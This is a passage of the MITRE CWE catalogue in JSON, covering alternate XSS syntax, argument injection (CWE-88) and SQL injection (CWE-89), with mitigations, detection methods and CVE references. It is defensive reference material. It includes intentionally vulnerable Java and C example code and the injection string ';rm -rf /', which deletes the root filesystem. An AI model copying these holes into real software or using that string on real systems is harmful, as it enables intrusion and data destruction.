tags in user-supplied input with a safe equivalent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String preventXSS(String input, String mask) {}","xhtml:div":{"#text":"return input.replaceAll(\\"script\\", mask);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code only works when the \\"script\\" tag is in all lower-case, forming an incomplete denylist (CWE-184). Equivalent tags such as \\"SCRIPT\\" or \\"ScRiPt\\" will not be neutralized by this method, allowing an XSS attack."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0738","Description":"XSS using \\"&={script}\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0738"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Alternate XSS syntax"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"199"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Alternate XSS Syntax","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Sanitize Alternate XSS Syntax","attr":{"@_Date":"2010-06-21"}}]}},"88":{"attr":{"@_ID":"88","@_Name":"Improper Neutralization of Argument Delimiters in a Command (\'Argument Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software constructs a string for a command to executed by a separate component\\nin another control sphere, but it does not properly delimit the\\nintended arguments, options, or switches within that command string.","Extended_Description":{"xhtml:p":"When creating commands using interpolation into a string, developers may assume that only the arguments/options that they specify will be processed. This assumption may be even stronger when the programmer has encoded the command in a way that prevents separate commands from being provided maliciously, e.g. in the case of shell metacharacters. When constructing the command, the developer may use whitespace or other delimiters that are required to separate arguments when the command. However, if an attacker can provide an untrusted input that contains argument-separating delimiters, then the resulting command will have more arguments than intended by the developer. The attacker may then be able to change the behavior of the command. Depending on the functionality supported by the extraneous arguments, this may have security-relevant consequences."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic","Read Application Data","Modify Application Data"],"Note":"An attacker could include arguments that allow unintended commands or code to be executed, allow sensitive data to be read or modified or could cause other unintended behavior."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Parameterization","Description":"Where possible, avoid building a single string that contains the command and its arguments. Some languages or frameworks have functions that support specifying independent arguments, e.g. as an array, which is used to automatically perform the appropriate quoting or escaping while building the command. For example, in PHP, escapeshellarg() can be used to escape a single argument to system(), or exec() can be called with an array of arguments. In C, code can often be refactored from using system() - which accepts a single string - to using exec(), which requires separate function arguments for each parameter.","Effectiveness":"High"},{"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, request headers as well as content, URL components, e-mail, files, databases, and any external systems that provide data to the application. Perform input validation at well-defined interfaces."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Implementation","Description":"Directly convert your input type into the expected data type, such as using a conversion function that translates a string into a number. After converting to the expected data type, ensure that the input\'s values fall within the expected range of allowable values and that multi-field consistencies are maintained."},{"Phase":"Implementation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.","Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content."]}},{"Phase":"Implementation","Description":"When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so."},{"Phase":"Implementation","Description":"When your application combines data from multiple sources, perform the validation after the sources have been combined. The individual data elements may pass the validation step but violate the intended restrictions after they have been combined."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-30"},"Intro_Text":"The following simple program accepts a filename as a command line argument and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main(int argc, char** argv) {}","xhtml:div":{"#text":"char cmd[CMD_MAX] = \\"/usr/bin/cat \\";strcat(cmd, argv[1]);system(cmd);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":["Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form \\";rm -rf /\\", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition.","Note that if argv[1] is a very long argument, then this issue might also be subject to a buffer overflow (CWE-120)."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0113","Description":"Canonical Example","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0113"},{"Reference":"CVE-2001-0150","Description":"Web browser executes Telnet sessions using command line arguments that are specified by the web site, which could allow remote attackers to execute arbitrary commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0150"},{"Reference":"CVE-2001-0667","Description":"Web browser allows remote attackers to execute commands by spawning Telnet with a log file option on the command line and writing arbitrary code into an executable file which is later executed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0667"},{"Reference":"CVE-2002-0985","Description":"Argument injection vulnerability in the mail function for PHP may allow attackers to bypass safe mode restrictions and modify command line arguments to the MTA (e.g. sendmail) possibly executing commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0985"},{"Reference":"CVE-2003-0907","Description":"Help and Support center in windows does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code via quotation marks in an \\"hcp://\\" URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0907"},{"Reference":"CVE-2004-0121","Description":"Mail client does not sufficiently filter parameters of mailto: URLs when using them as arguments to mail executable, which allows remote attackers to execute arbitrary programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0121"},{"Reference":"CVE-2004-0473","Description":"Web browser doesn\'t filter \\"-\\" when invoking various commands, allowing command-line switches to be specified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0473"},{"Reference":"CVE-2004-0480","Description":"Mail client allows remote attackers to execute arbitrary code via a URI that uses a UNC network share pathname to provide an alternate configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0480"},{"Reference":"CVE-2004-0489","Description":"SSH URI handler for web browser allows remote attackers to execute arbitrary code or conduct port forwarding via the a command line option.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0489"},{"Reference":"CVE-2004-0411","Description":"Web browser doesn\'t filter \\"-\\" when invoking various commands, allowing command-line switches to be specified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0411"},{"Reference":"CVE-2005-4699","Description":"Argument injection vulnerability in TellMe 1.2 and earlier allows remote attackers to modify command line arguments for the Whois program and obtain sensitive information via \\"--\\" style options in the q_Host parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4699"},{"Reference":"CVE-2006-1865","Description":"Beagle before 0.2.5 can produce certain insecure command lines to launch external helper applications while indexing, which allows attackers to execute arbitrary commands. NOTE: it is not immediately clear whether this issue involves argument injection, shell metacharacters, or other issues.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1865"},{"Reference":"CVE-2006-2056","Description":"Argument injection vulnerability in Internet Explorer 6 for Windows XP SP2 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via \\" (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2056"},{"Reference":"CVE-2006-2057","Description":"Argument injection vulnerability in Mozilla Firefox 1.0.6 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via \\" (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2057"},{"Reference":"CVE-2006-2058","Description":"Argument injection vulnerability in Avant Browser 10.1 Build 17 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via \\" (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2058"},{"Reference":"CVE-2006-2312","Description":"Argument injection vulnerability in the URI handler in Skype 2.0.*.104 and 2.5.*.0 through 2.5.*.78 for Windows allows remote authorized attackers to download arbitrary files via a URL that contains certain command-line switches.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2312"},{"Reference":"CVE-2006-3015","Description":"Argument injection vulnerability in WinSCP 3.8.1 build 328 allows remote attackers to upload or download arbitrary files via encoded spaces and double-quote characters in a scp or sftp URI.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3015"},{"Reference":"CVE-2006-4692","Description":"Argument injection vulnerability in the Windows Object Packager (packager.exe) in Microsoft Windows XP SP1 and SP2 and Server 2003 SP1 and earlier allows remote user-assisted attackers to execute arbitrary commands via a crafted file with a \\"/\\" (slash) character in the filename of the Command Line property, followed by a valid file extension, which causes the command before the slash to be executed, aka \\"Object Packager Dialogue Spoofing Vulnerability.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4692"},{"Reference":"CVE-2006-6597","Description":"Argument injection vulnerability in HyperAccess 8.4 allows user-assisted remote attackers to execute arbitrary vbscript and commands via the /r option in a telnet:// URI, which is configured to use hawin32.exe.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6597"},{"Reference":"CVE-2007-0882","Description":"Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client \\"-f\\" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882"},{"Reference":"CVE-2001-1246","Description":"Language interpreter\'s mail function accepts another argument that is concatenated to a string used in a dangerous popen() call. Since there is no neutralization of this argument, both OS Command Injection (CWE-78) and Argument Injection (CWE-88) are possible.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1246"},{"Reference":"CVE-2019-13475","Description":"Argument injection allows execution of arbitrary commands by injecting a \\"-exec\\" option, which is executed by the command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13475"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Argument Injection or Modification"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV03-C","Entry_Name":"Sanitize the environment when invoking external programs"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV33-C","Entry_Name":"Do not call system()","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR02-C","Entry_Name":"Sanitize data passed to complex subsystems"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":30,"Entry_Name":"Mail Command Injection"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"137"}},{"attr":{"@_CAPEC_ID":"174"}},{"attr":{"@_CAPEC_ID":"41"}},{"attr":{"@_CAPEC_ID":"460"}},{"attr":{"@_CAPEC_ID":"88"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-859"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, "The Argument Array", Page 567"}},{"attr":{"@_External_Reference_ID":"REF-1030"}}]},"Notes":{"Note":{"#text":"At one layer of abstraction, this can overlap other weaknesses that have whitespace problems, e.g. injection of javascript into attributes of HTML tags.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Description, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Description, Name, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Argument Injection or Modification","attr":{"@_Date":"2019-09-19"}},{"#text":"Improper Delimitation of Arguments in a Command (\'Argument Injection\')","attr":{"@_Date":"2019-09-23"}}]}},"89":{"attr":{"@_ID":"89","@_Name":"Improper Neutralization of Special Elements used in an SQL Command (\'SQL Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.","Extended_Description":{"xhtml:p":["Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. This can be used to alter query logic to bypass security checks, or to insert additional statements that modify the back-end database, possibly including execution of system commands.","SQL injection has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or software package with even a minimal user base is likely to be subject to an attempted attack of this kind. This flaw depends on the fact that SQL makes no real distinction between the control and data planes."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"943","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Database Server","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness typically appears in data-rich applications that save user inputs in a database."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL injection vulnerabilities."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If poor SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If authorization information is held in a SQL database, it may be possible to change this information through the successful exploitation of a SQL injection vulnerability."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL injection attack."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or do not require any code changes.","Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke SQL commands, leading to false negatives - especially if the API/library code is not available for analysis."]},"Effectiveness_Notes":"This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-9"},"Method":"Manual Analysis","Description":"Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Database Scanners"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using persistence layers such as Hibernate or Enterprise Java Beans, which can provide significant protection against SQL injection if used properly."]}},{"attr":{"@_Mitigation_ID":"MIT-27"},"Phase":"Architecture and Design","Strategy":"Parameterization","Description":{"xhtml:p":["If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.","Process SQL queries using prepared statements, parameterized queries, or stored procedures. These features should accept parameters or variables and support strong typing. Do not dynamically construct and execute query strings within these features using \\"exec\\" or similar functionality, since this may re-introduce the possibility of SQL injection. [REF-867]"]}},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":{"xhtml:p":["Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.","Specifically, follow the principle of least privilege when creating user accounts to a SQL database. The database users should only have the minimum privileges necessary to use their account. If the requirements of the system indicate that a user can read and modify their own data, then limit their privileges so they cannot read/write others\' data. Use the strictest permissions possible on all database objects, such as execute-only for stored procedures."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88).","Instead of building a new implementation, such features may be available in the database or programming language. For example, the Oracle DBMS_ASSERT package can check or enforce that parameters have certain properties that make them less vulnerable to SQL injection. For MySQL, the 